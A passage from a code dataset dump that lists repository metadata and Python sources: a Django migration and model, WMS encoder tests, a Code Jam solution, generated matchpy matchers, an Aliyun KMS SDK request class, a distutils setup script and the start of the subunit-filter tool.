blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d2dded48a1d604bda8edaeb28fbb63865106133a
|
e406487b60cf9a220c4164a2e6f6e612ec98843f
|
/mall/apps/goods/migrations/0002_auto_20190117_1555.py
|
7fdd947712c4473763b67eca18cb03688ec0a703
|
[] |
no_license
|
L-huihui/duoduo
|
3d7caad17664b045882043afacb3dcbc13008fb2
|
16bb64e1216a82a35867516e4351dffe68247415
|
refs/heads/master
| 2020-04-18T05:49:21.281388
| 2019-01-25T01:44:29
| 2019-01-25T01:44:29
| 167,293,055
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,655
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2019-01-17 07:55
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Rename the misspelled ``updata_time`` field to ``update_time``.

    The same rename is applied uniformly to every model in the app.
    """

    dependencies = [
        ('goods', '0001_initial'),
    ]

    operations = [
        migrations.RenameField(
            model_name=model_name,
            old_name='updata_time',
            new_name='update_time',
        )
        for model_name in (
            'brand',
            'goods',
            'goodscategory',
            'goodschannel',
            'goodsspecification',
            'sku',
            'skuimage',
            'skuspecification',
            'specificationoption',
        )
    ]
|
[
"xwp_fullstack@163.com"
] |
xwp_fullstack@163.com
|
0ba8e6cf08ec403a39f4114cd07dae91ac4183bf
|
f572e0a4b843ed3fd2cd8edec2ad3aab7a0019d3
|
/ows/wms/v13/test_encoders.py
|
d57cc1d1d58cfd386dcf9b086e8f9df557098abf
|
[
"MIT"
] |
permissive
|
EOxServer/pyows
|
9039c8ed7358c98d736e2b8fd9f47be944f0b0a1
|
e09310f992d6e69088940e9b5dbd7302f697344b
|
refs/heads/master
| 2022-10-09T23:27:43.884159
| 2022-10-04T10:03:25
| 2022-10-04T10:03:25
| 218,005,699
| 1
| 1
| null | 2022-01-04T13:36:06
| 2019-10-28T09:01:51
|
Python
|
UTF-8
|
Python
| false
| false
| 7,902
|
py
|
# -------------------------------------------------------------------------------
#
# Project: pyows <http://eoxserver.org>
# Authors: Fabian Schindler <fabian.schindler@eox.at>
#
# -------------------------------------------------------------------------------
# Copyright (C) 2019 EOX IT Services GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies of this Software or works derived from this Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# -------------------------------------------------------------------------------
from datetime import datetime, timedelta
from ows.util import Version, year, month
from ows.common.types import WGS84BoundingBox, BoundingBox
from ..types import (
ServiceCapabilities, FormatOnlineResource, Layer, Style, LegendURL,
Dimension, Range,
GetMapRequest, GetFeatureInfoRequest
)
from .encoders import xml_encode_capabilities, kvp_encode_get_map_request
def test_encode_capabilities():
    """Smoke-test XML encoding of WMS 1.3 capabilities documents.

    Encodes (and prints) a fully-defaulted document, then builds a maximally
    populated one exercising service metadata, contact information and a
    nested layer tree with styles and dimensions.

    NOTE(review): nothing is asserted here — the test only guards against
    exceptions during construction/encoding.
    """
    # Minimal document: everything defaulted.
    capabilities = ServiceCapabilities()
    print(xml_encode_capabilities(capabilities, pretty_print=True).value.decode('utf-8'))

    # Fully populated document.
    capabilities = ServiceCapabilities.with_defaults(
        'http://provider.org',
        ['image/png', 'image/jpeg'],
        ['text/html', 'application/json'],
        update_sequence='2018-05-08',
        title='Title',
        abstract='Description',
        keywords=[
            'test', 'WMS',
        ],
        fees='None',
        access_constraints=['None'],
        provider_name='Provider Inc',
        provider_site='http://provider.org',
        individual_name='John Doe',
        organisation_name='Provider Inc',
        position_name='CTO',
        phone_voice='+99/9008820',
        phone_facsimile='+99/9008821',
        delivery_point='Point du Hoc',
        city='City',
        administrative_area='Adminity',
        postal_code='12345',
        country='Cooontry',
        electronic_mail_address='john.doe@provider.org',
        online_resource='http://provider.org',
        hours_of_service='09:00AM - 18:00PM',
        contact_instructions='Just send a mail or a carrier pidgeon',
        role='Chief',
        layer=Layer(
            title='root layer',
            abstract='Some abstract',
            keywords=['Root', 'right?'],
            crss=['EPSG:4326', 'EPSG:3857'],
            wgs84_bounding_box=WGS84BoundingBox([-180, -90, 180, 90]),
            bounding_boxes=[
                # Web-Mercator extent of the root layer.
                BoundingBox('EPSG:3857', [
                    -20026376.39, -20048966.10,
                    20026376.39, 20048966.10,
                ])
            ],
            attribution='root attribution',
            authority_urls={
                'root-auth': 'http://provider.org',
            },
            identifiers={
                'root-auth': 'myId',
            },
            metadata_urls=[
                FormatOnlineResource(
                    format='text/xml',
                    href='http://provider.com/metadata.xml',
                )
            ],
            data_urls=[
                FormatOnlineResource(
                    format='image/tiff',
                    href='http://provider.com/data.tif',
                )
            ],
            min_scale_denominator=5,
            max_scale_denominator=10,
            layers=[
                # One queryable sub-layer with a style and two dimensions.
                Layer(
                    name='sublayer',
                    title='My Sub-layer',
                    queryable=True,
                    styles=[
                        Style(
                            name='styli',
                            title='Styli',
                            abstract='stylisch Style',
                            legend_urls=[
                                LegendURL(
                                    width=500,
                                    height=300,
                                    format='image/jpeg',
                                    href='http://provider.com/legend.jpg',
                                )
                            ],
                            style_sheet_url=FormatOnlineResource(
                                'text/xml',
                                href='http://provider.com/stylesheet.xml',
                            ),
                            style_url=FormatOnlineResource(
                                'text/xml',
                                href='http://provider.com/style.xml',
                            )
                        )
                    ],
                    dimensions=[
                        # Time dimension expressed as a start/end/step range.
                        Dimension(
                            name='time',
                            units='seconds',
                            values=Range(
                                datetime(2018, 5, 10),
                                datetime(2018, 5, 12),
                                timedelta(hours=1),
                            ),
                            unit_symbol='s',
                            default='',
                            multiple_values=False,
                            nearest_value=True,
                            current=False
                        ),
                        # Elevation dimension expressed as discrete values.
                        Dimension(
                            name='elevation',
                            units='meters',
                            values=[5, 10, 500, 1000, 15000],
                            unit_symbol='m',
                            default='',
                            multiple_values=False,
                            nearest_value=True,
                            current=False
                        )
                    ]
                )
            ]
        ),
    )
    # NOTE(review): the big document above is only constructed, never encoded —
    # the encode call is commented out. Re-enable once its output is asserted.
    # print(xml_encode_capabilities(capabilities, pretty_print=True).value.decode('utf-8'))
def test_encode_getmap():
    """Smoke-test KVP encoding of GetMap requests.

    NOTE(review): results are printed, not asserted — this only guards
    against exceptions during encoding.
    """
    # Plain request: no time/elevation, empty custom dimensions.
    print(kvp_encode_get_map_request(GetMapRequest(
        Version(1, 3, 0),
        layers=['a', 'b', 'c'],
        styles=['s1', 's2', None],
        bounding_box=BoundingBox('EPSG:4326', [0, 0, 10, 10]),
        width=256,
        height=256,
        format='image/jpeg',
        dimensions={}
    )))
    # Request with time range, elevation and custom dimensions covering the
    # three supported shapes: scalar, list of values, and list of ranges.
    print(kvp_encode_get_map_request(GetMapRequest(
        Version(1, 3, 0),
        layers=['a', 'b', 'c'],
        styles=['s1', 's2', None],
        bounding_box=BoundingBox('EPSG:4326', [0, 0, 10, 10]),
        width=256,
        height=256,
        format='image/jpeg',
        time=Range(year(2012), year(2013)),
        elevation=1000,
        dimensions={
            'wavelength': '2456.2',
            'pressure': ['123', '234'],
            'range': [Range('0', '1'), Range('2', '4')]
        }
    )))
def test_encode_getfeatureinfo():
    """Construct a GetFeatureInfo request.

    NOTE(review): unlike the GetMap test above, the object is only built —
    nothing is encoded, printed or asserted, so this test merely guards
    against constructor errors.
    """
    GetFeatureInfoRequest(
        Version(1, 3, 0),
        layers=['a', 'b', 'c'],
        styles=['s1', 's2', None],
        bounding_box=BoundingBox('EPSG:4326', [0, 0, 10, 10]),
        width=256,
        height=256,
        format='image/jpeg',
        dimensions={},
        query_layers=['a', 'b'],
        info_format='text/xml',
        i=12,
        j=12,
        feature_count=15,
    )
|
[
"fabian.schindler.strauss@gmail.com"
] |
fabian.schindler.strauss@gmail.com
|
b72ad75306f31160948715d6656aedb45e1792c7
|
e2e993962d6e5e30905d13f0532acdac9302c84b
|
/HTL.tab/Test.panel/Test.pushbutton/keyman/keyman/keys/models.py
|
a35c8dcb63e577c0174f8f38772822ae3ef1b000
|
[
"MIT"
] |
permissive
|
htlcnn/pyrevitscripts
|
a1777fa0ba36003443d95e0f9fbbcadc4ffa5fe7
|
b898a3a5e8d212570254772ae314f343498b1398
|
refs/heads/master
| 2021-01-01T20:08:31.001558
| 2018-01-11T06:44:26
| 2018-01-11T06:44:26
| 98,773,971
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 300
|
py
|
from django.db import models
from django.core.urlresolvers import reverse
class Software(models.Model):
    """A piece of software whose keys are tracked by this app."""
    # Display name of the software product.
    name = models.CharField(max_length=200)

    def __unicode__(self):
        # Python 2 Django: text representation used by the admin and templates.
        return self.name

    def get_absolute_url(self):
        # Canonical URL is the edit view; 'software_edit' must be a named URL
        # in the project's urlconf (not visible from this file).
        return reverse('software_edit', kwargs={'pk': self.pk})
|
[
"hoangthanhlong@gmail.com"
] |
hoangthanhlong@gmail.com
|
849cad464c0731a0afd6cb94a57fdc9007ce5036
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_200/2122.py
|
c31ad8bdbc94a1aa0c0f79101990a413684bb5df
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 986
|
py
|
def resolve_case():
num = int(input())
num_list = list(str(num))
assend_index = 0
same=1
for assend_index in range(1, len(num_list)):
if num_list[assend_index - 1] > num_list[assend_index]:
break;
elif num_list[assend_index - 1] == num_list[assend_index]:
same += 1
else:
same = 1
print("".join(num_list[:assend_index-same]), end="")
num_list_tmp = num_list[assend_index-same:]
num_list_sorted = num_list[assend_index-same:]
num_list_sorted.sort()
length = len(num_list_tmp)
for x in range(0, length):
if num_list_tmp[x] is num_list_sorted[x]:
print(num_list_tmp[x], end="")
else:
print(int(str(int(num_list_tmp[x]) - 1) + ("9" * (length - x - 1))), end="")
break
return
# Code Jam driver: first input line is the case count; each answer is printed
# on its own line prefixed with "Case #i: ".
case_count = int(input())
for case_index in range(1, case_count + 1):
    print("Case #" + str(case_index), end=": ")
    resolve_case()
    print()
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
d03578c423b75b0a881d10b32f169ad9a5075cbb
|
f445450ac693b466ca20b42f1ac82071d32dd991
|
/generated_tempdir_2019_09_15_163300/generated_part005394.py
|
e5781c7991690423aaa123393d0e5d46def81e37
|
[] |
no_license
|
Upabjojr/rubi_generated
|
76e43cbafe70b4e1516fb761cabd9e5257691374
|
cd35e9e51722b04fb159ada3d5811d62a423e429
|
refs/heads/master
| 2020-07-25T17:26:19.227918
| 2019-09-15T15:41:48
| 2019-09-15T15:41:48
| 208,357,412
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,559
|
py
|
from sympy.abc import *
from matchpy.matching.many_to_one import CommutativeMatcher
from matchpy import *
from matchpy.utils import VariableWithCount
from collections import deque
from multiset import Multiset
from sympy.integrals.rubi.constraints import *
from sympy.integrals.rubi.utility_function import *
from sympy.integrals.rubi.rules.miscellaneous_integration import *
from sympy import *
class CommutativeMatcher33668(CommutativeMatcher):
    """Auto-generated commutative matcher (matchpy code-generator output).

    NOTE(review): this module is machine-generated (rubi_generated); manual
    edits will be lost on regeneration. Comments below annotate the generated
    decision tree, they do not alter it.
    """
    # Singleton storage for get().
    _instance = None
    # Generated pattern table; tuple layout is defined by matchpy's code
    # generator — NOTE(review): semantics not verifiable from this file alone.
    patterns = {
        0: (0, Multiset({0: 1, 1: 1}), [
        ])
    }
    subjects = {}
    subjects_by_id = {}
    bipartite = BipartiteGraph()
    # Matching is performed modulo associativity of Mul.
    associative = Mul
    max_optional_count = 0
    anonymous_patterns = set()

    def __init__(self):
        self.add_subject(None)

    @staticmethod
    def get():
        # Lazily create and cache the singleton instance.
        if CommutativeMatcher33668._instance is None:
            CommutativeMatcher33668._instance = CommutativeMatcher33668()
        return CommutativeMatcher33668._instance

    @staticmethod
    def get_match_iter(subject):
        # Generated decision tree: yields (pattern_index, substitution) pairs.
        # Subjects are popped for inspection and pushed back (appendleft)
        # before leaving each branch, restoring state for the next branch.
        subjects = deque([subject]) if subject is not None else deque()
        subst0 = Substitution()
        # State 33667
        if len(subjects) >= 1 and isinstance(subjects[0], Pow):
            tmp1 = subjects.popleft()
            subjects2 = deque(tmp1._args)
            # State 33669
            if len(subjects2) >= 1:
                tmp3 = subjects2.popleft()
                subst1 = Substitution(subst0)
                try:
                    subst1.try_add_variable('i2.2.1.2.2.2.1', tmp3)
                except ValueError:
                    pass
                else:
                    pass
                    # State 33670
                    if len(subjects2) >= 1:
                        tmp5 = subjects2.popleft()
                        subst2 = Substitution(subst1)
                        try:
                            subst2.try_add_variable('i2.2.1.2.2.2.2', tmp5)
                        except ValueError:
                            pass
                        else:
                            pass
                            # State 33671
                            if len(subjects2) == 0:
                                pass
                                # State 33672
                                if len(subjects) == 0:
                                    pass
                                    # 0: x**m
                                    yield 0, subst2
                        subjects2.appendleft(tmp5)
            subjects2.appendleft(tmp3)
            subjects.appendleft(tmp1)
        if len(subjects) >= 1 and isinstance(subjects[0], Add):
            tmp7 = subjects.popleft()
            associative1 = tmp7
            associative_type1 = type(tmp7)
            subjects8 = deque(tmp7._args)
            # Delegate the Add arguments to the nested generated matcher
            # (defined in a sibling generated module).
            matcher = CommutativeMatcher33674.get()
            tmp9 = subjects8
            subjects8 = []
            for s in tmp9:
                matcher.add_subject(s)
            for pattern_index, subst1 in matcher.match(tmp9, subst0):
                pass
                if pattern_index == 0:
                    pass
                    # State 33691
                    if len(subjects) == 0:
                        pass
                        # 1: f + e*x**r
                        yield 1, subst1
            subjects.appendleft(tmp7)
        return
        # Unreachable yield: generated to guarantee this function is a generator.
        yield
from matchpy.matching.many_to_one import CommutativeMatcher
from collections import deque
from .generated_part005395 import *
from matchpy.utils import VariableWithCount
from multiset import Multiset
|
[
"franz.bonazzi@gmail.com"
] |
franz.bonazzi@gmail.com
|
0e7ff815cea27a8a05cb59b0e158e66ee68977ce
|
1896685500833ba2e4e25400a03e10536dc57ad5
|
/apimpe/wsgi.py
|
7ebc7b896b1a99ceded6af9f77e7fbd203d23e58
|
[] |
no_license
|
Oswaldinho24k/MPE-API
|
04e5d134199083300c2eac2b2d21e206e4306eeb
|
2e1d7b282f994867c04d31b09395785d73d90b9d
|
refs/heads/master
| 2020-06-21T14:53:18.903127
| 2016-12-02T18:57:25
| 2016-12-02T18:57:25
| 74,783,930
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 482
|
py
|
"""
WSGI config for apimpe project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
from whitenoise.django import DjangoWhiteNoise
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "apimpe.settings")
application = get_wsgi_application()
application = DjangoWhiteNoise(application)
|
[
"oswalfut_96@hotmail.com"
] |
oswalfut_96@hotmail.com
|
2dc917a66e8ef838946a5fcb757890bce77a7963
|
9405aa570ede31a9b11ce07c0da69a2c73ab0570
|
/aliyun-python-sdk-kms/aliyunsdkkms/request/v20160120/GenerateDataKeyWithoutPlaintextRequest.py
|
681ae27d16cff738aea6473faf406f81efbeea7d
|
[
"Apache-2.0"
] |
permissive
|
liumihust/aliyun-openapi-python-sdk
|
7fa3f5b7ea5177a9dbffc99e73cf9f00e640b72b
|
c7b5dd4befae4b9c59181654289f9272531207ef
|
refs/heads/master
| 2020-09-25T12:10:14.245354
| 2019-12-04T14:43:27
| 2019-12-04T14:43:27
| 226,002,339
| 1
| 0
|
NOASSERTION
| 2019-12-05T02:50:35
| 2019-12-05T02:50:34
| null |
UTF-8
|
Python
| false
| false
| 2,008
|
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkkms.endpoint import endpoint_data
class GenerateDataKeyWithoutPlaintextRequest(RpcRequest):
    """RPC request for the KMS ``GenerateDataKeyWithoutPlaintext`` action
    (API version 2016-01-20), exposing its query parameters via accessors."""

    def __init__(self):
        RpcRequest.__init__(self, 'Kms', '2016-01-20', 'GenerateDataKeyWithoutPlaintext', 'kms')
        self.set_protocol_type('https')
        # Endpoint-resolution data is attached only when the installed core
        # SDK class defines the corresponding attributes.
        if hasattr(self, "endpoint_map"):
            self.endpoint_map = endpoint_data.getEndpointMap()
        if hasattr(self, "endpoint_regional"):
            self.endpoint_regional = endpoint_data.getEndpointRegional()

    def get_EncryptionContext(self):
        """Return the 'EncryptionContext' query parameter, or None."""
        params = self.get_query_params()
        return params.get('EncryptionContext')

    def set_EncryptionContext(self, EncryptionContext):
        """Set the 'EncryptionContext' query parameter."""
        self.add_query_param('EncryptionContext', EncryptionContext)

    def get_KeyId(self):
        """Return the 'KeyId' query parameter, or None."""
        params = self.get_query_params()
        return params.get('KeyId')

    def set_KeyId(self, KeyId):
        """Set the 'KeyId' query parameter."""
        self.add_query_param('KeyId', KeyId)

    def get_KeySpec(self):
        """Return the 'KeySpec' query parameter, or None."""
        params = self.get_query_params()
        return params.get('KeySpec')

    def set_KeySpec(self, KeySpec):
        """Set the 'KeySpec' query parameter."""
        self.add_query_param('KeySpec', KeySpec)

    def get_NumberOfBytes(self):
        """Return the 'NumberOfBytes' query parameter, or None."""
        params = self.get_query_params()
        return params.get('NumberOfBytes')

    def set_NumberOfBytes(self, NumberOfBytes):
        """Set the 'NumberOfBytes' query parameter."""
        self.add_query_param('NumberOfBytes', NumberOfBytes)
|
[
"sdk-team@alibabacloud.com"
] |
sdk-team@alibabacloud.com
|
f6f69bd11a57079c1e860e060690db08820b94e3
|
67553d46a257631810f394908013b82c337e0fbd
|
/goat/chapter05/5.2/globals_test.py
|
cc3a84eb474eb4feacb54ede07ac205a359b442a
|
[] |
no_license
|
bopopescu/goat-python
|
3f9d79eb1a9c2733345d699c98d82f91968ca5fa
|
c139488e2b5286033954df50ae1ca834144446f5
|
refs/heads/master
| 2022-11-21T11:25:27.921210
| 2020-03-06T01:02:57
| 2020-03-06T01:02:57
| 281,066,748
| 0
| 0
| null | 2020-07-20T09:00:08
| 2020-07-20T09:00:08
| null |
UTF-8
|
Python
| false
| false
| 154
|
py
|
# coding: utf-8

# Demonstrates reading and rebinding a module-level (global) name from
# inside a function.
name = 'Charlie'


def test():
    # BUG FIX: the original assigned ``name`` below without declaring it
    # global, which makes ``name`` local to the function and causes the
    # first print to raise UnboundLocalError. Declaring it global restores
    # the behavior the inline comments describe.
    global name
    print(name)  # Charlie
    name = '孙悟空'


test()
print(name)  # 孙悟空 — test() rebound the global
|
[
"34465021+jwfl724168@users.noreply.github.com"
] |
34465021+jwfl724168@users.noreply.github.com
|
51719366dd3b45e9da2070caf4e1ca0906df0c1b
|
24d8cf871b092b2d60fc85d5320e1bc761a7cbe2
|
/eXe/rev2283-2409/base-trunk-2283/prototype/pyfox/setup.py
|
58da3fb0318bb0b263de8f582d9d2d07804158ca
|
[] |
no_license
|
joliebig/featurehouse_fstmerge_examples
|
af1b963537839d13e834f829cf51f8ad5e6ffe76
|
1a99c1788f0eb9f1e5d8c2ced3892d00cd9449ad
|
refs/heads/master
| 2016-09-05T10:24:50.974902
| 2013-03-28T16:28:47
| 2013-03-28T16:28:47
| 9,080,611
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,325
|
py
|
import os
# NOTE(review): distutils was removed in Python 3.12; this script targets an
# old Python/Mozilla embedding toolchain.
from distutils.core import setup, Extension

# Hard-coded path to a local Mozilla/Firefox source checkout — must be
# adapted per machine before building.
Moz = "/home/djm/work/firefox/mozilla"
MozDist = Moz + "/dist"

# Single C++ extension linking against Gecko embedding + XPCOM libraries.
setup(name='pyfoxutil',
      version='1.0',
      ext_modules=[Extension('_pyfoxutil', ['pyfoxutil.cpp'],
                             include_dirs=[MozDist + "/include/embed_base",
                                           MozDist + "/include/string",
                                           MozDist + "/include/xpcom",
                                           MozDist + "/include/widget",
                                           MozDist + "/include/nspr",
                                           MozDist + "/include/gfx",
                                           MozDist + "/include/webbrwsr",
                                           MozDist + "/include/uriloader",
                                           Moz + "/extensions/python/xpcom/src",
                                           ],
                             library_dirs=[Moz + "/extensions/python/xpcom/src",
                                           MozDist + "/lib"],
                             libraries=["nspr4", "plc4", "plds4",
                                        "xpcomcomponents_s",
                                        "embed_base_s", "_xpcom",
                                        ])
                   ],
      )
|
[
"joliebig@fim.uni-passau.de"
] |
joliebig@fim.uni-passau.de
|
59cee6f8de1719cbc71645dcc02d79317246d9ea
|
ce083128fa87ca86c65059893aa8882d088461f5
|
/python/python-salad-bdd/.venv/bin/subunit-filter
|
317293fe0fb7c7007d0cf0b7e77ec7d6c6da347c
|
[] |
no_license
|
marcosptf/fedora
|
581a446e7f81d8ae9a260eafb92814bc486ee077
|
359db63ff1fa79696b7bc803bcfa0042bff8ab44
|
refs/heads/master
| 2023-04-06T14:53:40.378260
| 2023-03-26T00:47:52
| 2023-03-26T00:47:52
| 26,059,824
| 6
| 5
| null | 2022-12-08T00:43:21
| 2014-11-01T18:48:56
| null |
UTF-8
|
Python
| false
| false
| 7,071
|
#!/home/marcosptf/developer/python-bdd/.venv/bin/python2
# subunit: extensions to python unittest to get test results from subprocesses.
# Copyright (C) 200-2013 Robert Collins <robertc@robertcollins.net>
# (C) 2009 Martin Pool
#
# Licensed under either the Apache License, Version 2.0 or the BSD 3-clause
# license at the users choice. A copy of both licenses are available in the
# project source as Apache-2.0 and BSD. You may not use this file except in
# compliance with one of these two licences.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under these licenses is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# license you chose for the specific language governing permissions and
# limitations under that license.
#
"""Filter a subunit stream to include/exclude tests.
The default is to strip successful tests.
Tests can be filtered by Python regular expressions with --with and --without,
which match both the test name and the error text (if any). The result
contains tests which match any of the --with expressions and none of the
--without expressions. For case-insensitive matching prepend '(?i)'.
Remember to quote shell metacharacters.
"""
from optparse import OptionParser
import sys
import re
from testtools import ExtendedToStreamDecorator, StreamToExtendedDecorator
from subunit import (
DiscardStream,
ProtocolTestCase,
StreamResultToBytes,
read_test_list,
)
from subunit.filters import filter_by_result, find_stream
from subunit.test_results import (
and_predicates,
make_tag_filter,
TestResultFilter,
)
def make_options(description):
    """Build the OptionParser for the subunit-filter command line.

    Args:
        description: help text shown by ``--help``.
    Returns:
        A configured ``optparse.OptionParser``.
    """
    # BUG FIX: the ``description`` parameter used to be ignored in favour of
    # the module-level __doc__. Honour it instead — the only caller passes
    # __doc__, so behavior is unchanged for existing callers.
    parser = OptionParser(description=description)
    # Each include/exclude pair shares a dest; the *exclude* flag wins when
    # both are given later on the command line.
    parser.add_option("--error", action="store_false",
        help="include errors", default=False, dest="error")
    parser.add_option("-e", "--no-error", action="store_true",
        help="exclude errors", dest="error")
    parser.add_option("--failure", action="store_false",
        help="include failures", default=False, dest="failure")
    parser.add_option("-f", "--no-failure", action="store_true",
        help="exclude failures", dest="failure")
    parser.add_option("--passthrough", action="store_false",
        help="Forward non-subunit input as 'stdout'.", default=False,
        dest="no_passthrough")
    parser.add_option("--no-passthrough", action="store_true",
        help="Discard all non subunit input.", default=False,
        dest="no_passthrough")
    # Successes are stripped by default (default=True on the exclude flag).
    parser.add_option("-s", "--success", action="store_false",
        help="include successes", dest="success")
    parser.add_option("--no-success", action="store_true",
        help="exclude successes", default=True, dest="success")
    parser.add_option("--no-skip", action="store_true",
        help="exclude skips", dest="skip")
    parser.add_option("--xfail", action="store_false",
        help="include expected failures", default=True, dest="xfail")
    parser.add_option("--no-xfail", action="store_true",
        help="exclude expected failures", default=True, dest="xfail")
    parser.add_option(
        "--with-tag", type=str,
        help="include tests with these tags", action="append", dest="with_tags")
    parser.add_option(
        "--without-tag", type=str,
        help="exclude tests with these tags", action="append", dest="without_tags")
    parser.add_option("-m", "--with", type=str,
        help="regexp to include (case-sensitive by default)",
        action="append", dest="with_regexps")
    parser.add_option("--fixup-expected-failures", type=str,
        help="File with list of test ids that are expected to fail; on failure "
            "their result will be changed to xfail; on success they will be "
            "changed to error.", dest="fixup_expected_failures", action="append")
    parser.add_option("--without", type=str,
        help="regexp to exclude (case-sensitive by default)",
        action="append", dest="without_regexps")
    # -F expands to a canned set of flags via the callback below.
    parser.add_option("-F", "--only-genuine-failures", action="callback",
        callback=only_genuine_failures_callback,
        help="Only pass through failures and exceptions.")
    # BUG FIX: corrected "subsitutions" -> "substitutions" in the help text.
    parser.add_option("--rename", action="append", nargs=2,
        help="Apply specified regex substitutions to test names.",
        dest="renames", default=[])
    return parser
def only_genuine_failures_callback(option, opt, value, parser):
    """Expand -F/--only-genuine-failures into its component flags.

    The flags are pushed onto the front of the remaining argument list so
    optparse processes them next, in the pushed order.
    """
    for flag in ('--no-passthrough', '--no-xfail', '--no-skip', '--no-success'):
        parser.rargs.insert(0, flag)
def _compile_re_from_list(l):
return re.compile("|".join(l), re.MULTILINE)
def _make_regexp_filter(with_regexps, without_regexps):
"""Make a callback that checks tests against regexps.
with_regexps and without_regexps are each either a list of regexp strings,
or None.
"""
with_re = with_regexps and _compile_re_from_list(with_regexps)
without_re = without_regexps and _compile_re_from_list(without_regexps)
def check_regexps(test, outcome, err, details, tags):
"""Check if this test and error match the regexp filters."""
test_str = str(test) + outcome + str(err) + str(details)
if with_re and not with_re.search(test_str):
return False
if without_re and without_re.search(test_str):
return False
return True
return check_regexps
def _compile_rename(patterns):
def rename(name):
for (from_pattern, to_pattern) in patterns:
name = re.sub(from_pattern, to_pattern, name)
return name
return rename
def _make_result(output, options, predicate):
    """Make the result that we'll send the test outcomes to.

    Builds the decorator chain: a TestResultFilter (driven by the CLI
    options and *predicate*) wrapped for the streaming API, serialising
    filtered results as subunit v2 bytes onto *output*.
    """
    fixup_expected_failures = set()
    # Aggregate test ids from every --fixup-expected-failures file.
    for path in options.fixup_expected_failures or ():
        fixup_expected_failures.update(read_test_list(path))
    return StreamToExtendedDecorator(TestResultFilter(
        ExtendedToStreamDecorator(
            StreamResultToBytes(output)),
        filter_error=options.error,
        filter_failure=options.failure,
        filter_success=options.success,
        filter_skip=options.skip,
        filter_xfail=options.xfail,
        filter_predicate=predicate,
        fixup_expected_failures=fixup_expected_failures,
        rename=_compile_rename(options.renames)))
def main():
    """Entry point: parse CLI options, build the filter pipeline and run it."""
    parser = make_options(__doc__)
    (options, args) = parser.parse_args()
    # Combined predicate: test must match the --with/--without regexps AND
    # the --with-tag/--without-tag tag filter.
    regexp_filter = _make_regexp_filter(
        options.with_regexps, options.without_regexps)
    tag_filter = make_tag_filter(options.with_tags, options.without_tags)
    filter_predicate = and_predicates([regexp_filter, tag_filter])
    # NOTE(review): the lambda ignores its ``output_to`` argument and writes
    # to sys.stdout directly; this looks intentional given output_path=None,
    # but confirm against the subunit.filters.filter_by_result API.
    filter_by_result(
